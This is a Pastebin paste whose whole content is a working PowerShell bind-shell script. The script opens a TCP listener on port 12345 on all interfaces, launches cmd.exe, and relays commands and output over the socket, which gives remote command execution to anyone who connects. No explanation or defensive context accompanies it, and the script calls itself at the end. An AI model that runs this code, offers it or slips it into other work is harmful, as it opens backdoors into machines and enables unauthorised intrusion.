Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function BindShell {
- $port = "12345"
- $encoding = new-object System.Text.AsciiEncoding
- $endpoint = new-object System.Net.IpEndpoint ([System.Net.Ipaddress]::any, $port)
- $listener = new-object System.Net.Sockets.TcpListener $endpoint
- $listener.start()
- $socket = $listener.AcceptTcpClient()
- $networkstream = $socket.GetStream()
- $networkbuffer = New-Object System.Byte[] $socket.ReceiveBufferSize
- $process = New-Object System.Diagnostics.Process
- $process.StartInfo.FileName = "C:\\windows\\system32\\cmd.exe"
- $process.StartInfo.RedirectStandardInput = 1
- $process.StartInfo.RedirectStandardOutput = 1
- $process.StartInfo.UseShellExecute = 0
- $process.Start()
- $inputstream = $process.StandardInput
- $outputstream = $process.StandardOutput
- Start-Sleep 1
- while($outputstream.Peek() -ne -1){
- $string += $encoding.GetString($outputstream.Read())
- }
- $networkstream.Write($encoding.GetBytes($string),0,$string.Length)
- $string = ''
- $done = $false
- while (-not $done) {
- $pos = 0
- $i = 1
- while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
- $read = $networkstream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
- $pos+=$read
- if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {
- break
- }
- }
- if ($pos -gt 0) {
- $string = $encoding.GetString($networkbuffer,0,$pos)
- $inputstream.write($string)
- # Write Output
- $out = $encoding.GetString($outputstream.Read())
- while($outputstream.Peek() -ne -1){
- $out += $encoding.GetString($outputstream.Read())
- }
- $networkstream.Write($encoding.GetBytes($out),0,$out.length)
- $out = $null
- }
- else {$done = $true}
- }
- }
- bindshell
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
